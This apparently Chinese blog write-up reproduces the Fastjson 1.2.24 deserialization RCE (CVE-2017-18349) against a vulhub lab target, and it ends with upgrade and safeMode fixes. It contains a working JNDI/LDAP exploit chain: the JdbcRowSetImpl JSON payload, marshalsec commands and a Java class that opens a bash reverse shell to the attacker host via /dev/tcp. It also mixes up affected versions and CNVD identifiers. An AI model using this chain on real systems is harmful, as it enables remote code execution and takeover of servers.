Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

最新推荐文章于 2024-05-12 13:09:34 发布
最新推荐文章于 2024-05-12 13:09:34 发布
阅读量1k 收藏 6
点赞数 1
分类专栏: 漏洞复现 文章标签: java 安全 网络安全 运维 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/130103907
版权

0x01 漏洞简介:

​         fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。

​         阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。    

0x02 影响版本: 

fastjson<=1.2.24

该漏洞影响fastjson 1.2.80及之前所有版本

 图示:

 0x03 漏洞复现: 

环境准备

被攻击主机:CentOS7(192.168.217.140)

JDK版本:1.8 (shell弹不进去请检查版本)

靶场环境:vulhub/fastjson-1.2.24-rce

攻击主机:kali(192.168.217.141)

使用工具:marshalsec-0.0.3-SNAPSHOT-all.jar ,

GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

  • docker拉取镜像
docker-compose up -d

  • 启动环境并访问,出现下面页面表示访问成功

漏洞验证:

  • 配合dnslog申请个子域名来探测是否存在漏洞
  • 访问192.168.217.140:8090,使用brup拦截请求  
  • 修改请求方法为post,修改 Content-Type为: application/json
  • 添加请求正文,使用DNSLog进行验证:
{
	"a":{
	"@type":"java.net.Inet4Address",
	"val":"申请的域名"
	}
}

  • 发送后,dns有返回,证明存在此漏洞

 漏洞利用:

  • 编辑恶意类,创建一个.java 的文件,以反弹shell为例,而后使用javac命令进行编译而后放于kali中
import java.lang.Runtime;
import java.lang.Process;

public class GetShell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

 

  • 在cmd里面使用命令,编译为.class文件
javac GetShell.java

  • 将生成的文件,放在kali上,并开放http将GetShell.class变成可以访问
python -m SimpleHTTPServer

  • 然后下载前面的POC,上传至kali。起一个LDAP服务器监听6666端口,远程加载GetShell类,并同时打开监听反弹shell的端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.217.141:8000/#GetShell 6666

  • 然后使用BP抓包,再次修改请求正文,使其下载恶意代码并执行
{
	"b":{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"ldap://192.168.217.141:6666/GetShell",
	"autoCommit":true
	}
}
  • 按照图示,点击发送

  • 发送完成后,LDAP服务器接收到请求

  • httpserver收到get请求

  • 同时也接收到反弹shell,到此漏洞利用完成

 0x04 修复方案: 

  • 建议升级到最新版本1.2.83
  • safeMode加固。Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持 autoType,可杜绝反序列化Gadgets类变种攻击
  • 升级至Fastjson v2
kukuromi
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3047
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson 1.2.24漏洞
qq_18831583的博客
01-13 837
fastjson 1.2.24漏洞
Fastjson1.2.24-RCECVE-2017-18349)
aetlypdlg_ys的博客
05-12 881
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。
Fastjson 1.2.24 反序列化漏洞
huangyongkang666的博客
04-15 3741
fastjson 1.2.24 反序列化漏洞 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
【vulhub漏洞Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3679
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
fastjson-1.2.24漏洞,搭建及,手把手图文教程
芜湖~米汤来喽~
10-04 1408
【代码】fastjson-1.2.24漏洞,搭建及,手把手图文教程。
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的库,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE”漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
fastjson-1.2.24
09-22
JSON4J-1.0 IBM JSON4J 类型是受支持的实体类型。JSON4J 库包含在该产品的运行时环境中。您无需捆绑任何附加的库。
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
漏洞CVE-2017-18349(FastJson1.2.24反序列化导致任意命令执行漏洞
weixin_42282189的博客
09-13 1873
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责 0x01 前言 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 0x02 影响范围 影响范围:Fastjson1.2.24及之前版本。 0x03 环境准备 3.1 目标环境 3.1.1 靶场环境 vulhub靶场环境:CVE-2017-18349 3.1.2 靶机: Ubuntu2.
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5706
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
Fastjson 1.2.24 命令执行漏洞-JNDI简单实反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2537
Fastjson 1.2.24 命令执行漏洞-JNDI简单实反弹shell,不拖泥带水,最简单的办法实反弹shell与命令执行。
【超详细】Fastjson1.2.24反序列化漏洞
SuPejkj的博客
10-20 3338
0x01 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符.
FastJson1.2.24漏洞(详细步骤)
qq_35713681的博客
07-28 377
此测试用的是VM搭的Kali 2023.2。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞CVE-2017-18349)
Welcome To Myon'Blog !
03-09 2084
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
Fastjson 1.2.24漏洞搭建及——详解
网安小白的博客
08-02 899
反序列化Fastjson1.2.24漏洞全过程,图文详解,包含过程中出各种问题~
fastjson1.2.24rce漏洞
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值